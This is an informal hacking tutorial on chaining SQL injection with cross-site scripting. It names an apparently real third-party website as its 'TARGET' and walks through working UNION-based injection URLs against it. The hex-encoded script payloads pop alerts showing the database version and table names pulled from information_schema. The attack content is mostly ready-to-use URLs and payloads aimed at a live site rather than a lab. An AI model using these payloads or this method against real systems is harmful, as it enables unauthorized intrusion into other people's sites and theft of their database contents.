XSS with SQL Injection

In the Previous Tutorial Ultimate Guide to XSS (Cross Site Scripting)
We have cover the basics of XSS(Cross Site Scripting) and using its payloads in our Target Sites.So in this Tutorial you will learn XSS Attack via SQL Injection.
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".

While we are trying to Exploit a website through XSS Attack , Mostly we went to Check some "Input Area" like "Search Boxes" or** "Login Area"** .But we can do the Same via SQL Injection on that Target Site.

In XSS Attack via SQL Injection we will Execute our XSS payloads in UNION BASEDquery.

For Example:
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,
Here is The TARGET Site .
http://www.smelisting.net/corner_category.php?id=7

if we add Single Quote at the end of the Parameter it gives** MYSQL Error.**

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''7'' order by id desc' at line 1"

After Counting the Columns there are 5 Total Number of Columns.So let's ready up our Union Based Query and execute it .

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,3,4,5--+

There we got 3rd Column is printed on the page as output , So we will execute our XSS Payload in that column .

Here is the our XSS Payload that we are going to inject into the **UNION BASED **Query,

XSS PAYLOAD : <script>alert('XSS');</script>

Before executing this Payload we need to Encode it in HEX Value.
Here is the HEX Value of our Payload and add 0x in the start.

HEX VALUE:0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e

Let's Insert this payload in our Union Based Query and Execute the query,

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e,4,5--+

image.png

This Payload will Display us a XSS Pop-up Alert .This is the basic XSS Payload ,you can try more Payloads which were posted in the This Tutorial.

Manipulating SQL Injection Queries in XSS Payload

If we go on Further , we can also show our SQLi Queries Result in a XSS POP-Up Alert.We will insert our SQLi Queries in XSS Payload for showing up SQL Queries output in a POP-Up.
First let's say we want to Show The Current Version of the Target Site in a XSS POP-Up .See the example,

Our XSS Payload for Showing Version in a POP-Up:

<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">

The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.
Before executing our Query we need to encode our XSS Payload in Hex Value.

Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657274
2827524169204a65657e3a56657273696f6e3a,version(),0x30782729223e

Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657274282752
4169204a65657e3a56657273696f6e3a,version(),0x30782729223e),4,5--+

Let's Execute our Payload:

image.png

and here we got the Current Version in a XSS Pop-up.We can Do the Same For the Current Database and user.
After POP-UP the **Version **next part is To Showing Tables in a XSS POP-UP Alert.So we have to Insert our Query in XSS Payload for Displaying them in XSS Alert.
Here is our DIOS Query for getting Tables from the Current Database.

(select group_concat(table_name) from information_schema.tables where table_Schema=database())

Let's Add this **DIOS **Query in our XSS Payload .

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657274
2827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+

Now execute this Query and Check the output Response.

image.png

We got the Tables from the current Database . But if we go on Further and add HTML TAGS for Starting each Table in a New Line like** <BR>.But Here This HTML Doesn't Work.
In XSS we use " \n " **which is used for showing each result in a new Line.So will add This Part to Our **DIOS Query **to show All Tables in a New Line in our XSS Pop-Up.

We Need to First Encode it in Hex Value and then Insert into DIOS Query.

HEX Value: *n :0x5c6e*

Let's Add it in our XSS Payload** :**
http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c657
2742827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+

image.png

And Here we can see all tables are starting from a New line in XSS Pop-up Alert Box.We can do the Same For Columns by adding that Part in our DIOS Query.I Leave That part for You Guys.
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee